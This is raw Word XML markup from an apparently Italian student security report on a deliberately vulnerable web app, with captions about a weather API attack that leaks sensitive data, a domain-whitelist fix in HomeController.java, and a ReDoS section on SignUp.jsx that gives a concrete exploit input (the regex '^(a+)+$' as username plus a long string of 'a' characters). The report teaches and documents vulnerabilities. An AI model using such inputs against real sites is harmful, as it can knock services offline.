          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251879424" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6304FA13" wp14:editId="5D84FD43">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2536825</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6254750" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1851130761" name="Casella di testo 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E6EB77E" w14:textId="5C9E0709"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3</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Meteo.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FA13" id="_x0000_s1090" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:199.75pt;width:49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SLGwIAAEA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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="4E6EB77E" w14:textId="5C9E0709"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3</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Meteo.js</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA0B0E6" w14:textId="3FFDF5A6" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0B000452" w14:textId="4E38413A" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1723A4D0" w14:textId="01334E8C" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1C764485" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3692F509" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6A547D0B" w14:textId="77777777" w:rsidR="002666AE" w:rsidRDefault="002666AE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4857CBA1" w14:textId="3522AA70" w:rsidR="00AD3339" w:rsidRDefault="00A62E0F" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251990016" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2ECB547C" wp14:editId="7EAAC954">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-442595</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6979782" cy="2962275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1860167749"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79782" cy="2962275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B91CBF7" w14:textId="5E487EB9" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1EC110B6" w14:textId="4E56FDF8" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>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0DF15A57" w:rsidR="005E7293" w:rsidRDefault="00A62E0F" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251881472" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4049CDDB" wp14:editId="7F23724D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>319405</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7125970" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="352947276" name="Casella di tes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051DF92" w14:textId="6175108B"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4</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CDDB" id="_x0000_s1091" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:25.15pt;width:561.1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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7051DF92" w14:textId="6175108B"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4</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: HomeController.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="084A564A" w14:textId="6C2D7F09" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0B6522C4" w14:textId="3D1F4202" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="322FB0B4" w14:textId="70617B37" w:rsidR="005E7293" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251696128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="380C5466" wp14:editId="60020F4C">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560A070B" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2131E467" w14:textId="5600E3A9" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="23DC5664" w14:textId="1E81D270" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0F585680" w14:textId="5FF58496" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2028DE6F" w14:textId="352FC7EB" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5E39CFF6" w14:textId="694BED53" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="539D528D" w14:textId="66C0D474" w:rsidR="002666AE" w:rsidRDefault="00A62E0F" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251883520" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="787B6F8A" wp14:editId="0EA36080">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>111125</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4985385" cy="635"/>
                <wp:effectExtent l="0" t="0" r="5715" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="722758682" name="Casella di tes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F213915" w14:textId="53835F3E"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5</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Informazioni normali restituite sul me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F8A" id="_x0000_s1092" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:8.75pt;width:392.55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JGHAIAAEAEAAAOAAAAZHJzL2Uyb0RvYy54bWysU02P2jAQvVfqf7B8L4Hdgr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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="1F213915" w14:textId="53835F3E"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5</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Informazioni normali restituite sul meteo</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE05C6C" w14:textId="7B2AA6DA" w:rsidR="005E7293" w:rsidRDefault="00CE3AE0" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251697152" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="09E14F7E" wp14:editId="456A8DFC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>247015</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6567805" cy="2588895"/>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7805" cy="2588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2F7D27C" wp14:editId="22F643C7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-226060</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2931160</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6567805" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="263156726" name="Casella di testo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50602089" w14:textId="563ECECB"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6</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Informazioni sensibili restiuite dopo l'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27C" id="_x0000_s1093" type="#_x0000_t202" style="position:absolute;margin-left:-17.8pt;margin-top:230.8pt;width:517.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EGwIAAEAEAAAOAAAAZHJzL2Uyb0RvYy54bWysU99v2jAQfp+0/8Hy+wh0gla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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="50602089" w14:textId="563ECECB"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6</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Informazioni sensibili restiuite dopo l'attacco</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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4307BCB6" w14:textId="77777777" w:rsidR="00CE3AE0" w:rsidRDefault="00CE3AE0" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7D49469C" w14:textId="77777777" w:rsidR="00CE3AE0" w:rsidRDefault="00CE3AE0" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2DE68A83" w14:textId="334B34E8" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6F226C32" w14:textId="77777777" w:rsidR="00CE3AE0" w:rsidRPr="00CE3AE0" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE3AE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Fix: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BECCB54" w14:textId="761CE224" w:rsidR="005E7293" w:rsidRDefault="00CE3AE0" w:rsidP="00467BBC">
      <w:r>
        <w:t>Per evitare la vulnerabilità, è stata</w:t>
      </w:r>
      <w:r w:rsidR="00D83D81">
        <w:t xml:space="preserve"> usa</w:t>
      </w:r>
      <w:r>
        <w:t>ta</w:t>
      </w:r>
      <w:r w:rsidR="00D83D81">
        <w:t xml:space="preserve"> una whitelist di domini consentiti da poter visitare lato backend</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00D83D81">
        <w:t xml:space="preserve"> in modo da bloccare i link non consentiti.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> È stata modificata quindi l’API </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3AE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/meteo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3AE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HomeController.java</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> come mostrato in Figura 6</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381AAA8C" w14:textId="0EA14472" w:rsidR="00D72C3C" w:rsidRDefault="00A62E0F" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251991040" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="234A6D15" wp14:editId="1B4590E8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>8890</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6951611" cy="3832225"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1705126447"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1611" cy="3832225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00CE3AE0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251887616" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2BFEF611" wp14:editId="2EB6BB11">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-225425</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3926205</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6783705" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1438855782" name="Casella di testo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78CF6F62" w14:textId="3472D868"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7</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F611" id="_x0000_s1094" type="#_x0000_t202" style="position:absolute;margin-left:-17.75pt;margin-top:309.15pt;width:53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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="78CF6F62" w14:textId="3472D868"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>67</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: HomeController.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3BDB25" w14:textId="414BA90E" w:rsidR="00D72C3C" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5861AEA5" w14:textId="22F70197" w:rsidR="00D72C3C" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5F12D79A" w14:textId="355DA891" w:rsidR="00D72C3C" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="48E25F87" w14:textId="030786E8" w:rsidR="00D72C3C" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1CF5E927" w14:textId="4E3D4738" w:rsidR="00D72C3C" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="52F337BC" w14:textId="1B6256A1" w:rsidR="00D72C3C" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="48157CE8" w14:textId="535761BA" w:rsidR="00D72C3C" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="058A00F5" w14:textId="10938ABA" w:rsidR="00D72C3C" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0B2359A3" w14:textId="77715FFF"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10198CFC" w14:textId="77777777" w:rsidR="00CE3AE0" w:rsidRDefault="00CE3AE0" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1299E30C" w14:textId="77777777" w:rsidR="00CE3AE0" w:rsidRDefault="00CE3AE0" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2EEA9A69" w14:textId="5A288779" w:rsidR="005E7293" w:rsidRPr="00CE3AE0" w:rsidRDefault="00A74318" w:rsidP="00CE3AE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE3AE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Regex DOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA5937B" w14:textId="4788F8F9" w:rsidR="00CE3AE0" w:rsidRDefault="00CE3AE0" w:rsidP="00A74318">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00250F61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SignUp.jsx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BF31BF" w14:textId="54C462F1" w:rsidR="00CE3AE0" w:rsidRDefault="00CE3AE0" w:rsidP="00A74318">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00250F61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Riga:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3F1657" w14:textId="03540DE4" w:rsidR="00FA683C" w:rsidRDefault="00FA683C" w:rsidP="00A74318">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ReDos è un attacco di tipo Denial of Service, generato dall’utilizzo di espressioni regolari che se portati ad una situazione estrema in cui vengono inseriti tanti caratteri, fanno bloccare il programma nella fase di validazione del pattern, causando quindi un Denial of Service. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5D5079" w14:textId="55F32571" w:rsidR="00250F61" w:rsidRDefault="00FA683C" w:rsidP="00A74318">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Nel nostro caso è</w:t>
      </w:r>
      <w:r w:rsidR="00A74318">
        <w:t xml:space="preserve"> stata introdotta una </w:t>
      </w:r>
      <w:r w:rsidR="00A74318" w:rsidRPr="00250F61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>regex</w:t>
      </w:r>
      <w:r w:rsidR="00A74318">
        <w:t xml:space="preserve"> per validare la password con lo username, in modo tale che la password non possa contenere lo username all’interno</w:t>
      </w:r>
      <w:r w:rsidR="00250F61">
        <w:t>, come visibile in Figura 6</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00250F61">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A74318">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A35E8B0" w14:textId="77777777" w:rsidR="0060328E" w:rsidRDefault="0060328E" w:rsidP="00A74318">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BE8ACC1" w14:textId="77777777" w:rsidR="0060328E" w:rsidRDefault="0060328E" w:rsidP="00A74318">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C680FA" w14:textId="1F4EA92D" w:rsidR="00250F61" w:rsidRDefault="00250F61" w:rsidP="00250F61">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00250F61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF800CF" w14:textId="60F21F05" w:rsidR="00A74318" w:rsidRDefault="00250F61" w:rsidP="00250F61">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando ci si registra al sito, bisogna inserire la regex </w:t>
      </w:r>
      <w:r w:rsidRPr="00A74318">
        <w:t>^(a+)+$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> al posto dello username e la</w:t>
      </w:r>
      <w:r w:rsidR="00A74318">
        <w:t xml:space="preserve"> password: </w:t>
      </w:r>
      <w:r w:rsidR="00A74318" w:rsidRPr="00A74318">
        <w:t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DE4DFB" w14:textId="7AF50578" w:rsidR="00A74318" w:rsidRDefault="00250F61" w:rsidP="00A74318">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A causa della lunghezza della password, </w:t>
      </w:r>
      <w:r w:rsidR="002C11A4">
        <w:t xml:space="preserve">si può verificare un blocco lato front-end, </w:t>
      </w:r>
      <w:r w:rsidR="00A74318">
        <w:t>generando un DOS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Figura 6</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="002C11A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404C9ECF" w14:textId="06CCC70F" w:rsidR="00A74318" w:rsidRDefault="0060328E" w:rsidP="00250F61">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251992064" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2023E590" wp14:editId="697A3635">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>9525</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6145530" cy="770570"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23002127"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5530" cy="770570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00250F61">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251889664" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="29586422" wp14:editId="621307D4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>316865</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>825500</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5478780" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1806369002" name="Casella di testo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23E7AB3" w14:textId="07CDE97D"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68</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: SignUp.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6422" id="_x0000_s1095" type="#_x0000_t202" style="position:absolute;margin-left:24.95pt;margin-top:65pt;width:431.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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="223E7AB3" w14:textId="07CDE97D"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68</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: SignUp.jsx</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E393689" w14:textId="77777777" w:rsidR="002C11A4" w:rsidRPr="00A74318" w:rsidRDefault="002C11A4" w:rsidP="00A74318">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22278544" w14:textId="17022935" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="127D6B7D" w14:textId="64DCED0D" w:rsidR="005E7293" w:rsidRDefault="00250F61" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251891712" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0A7EFBE5" wp14:editId="71855D38">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-549910</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3366135</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7215505" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1821779388" name="Casella di testo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B5A437E" w14:textId="25CB401B"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69</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Server in errore a causa del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E5" id="_x0000_s1096" type="#_x0000_t202" style="position:absolute;margin-left:-43.3pt;margin-top:265.05pt;width:56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cN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5rPFYrrg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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="3B5A437E" w14:textId="25CB401B"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69</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Server in errore a causa del DOS</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251699200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="35A093B3" wp14:editId="47CC270D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>24701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12010828" w14:textId="0B312813" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
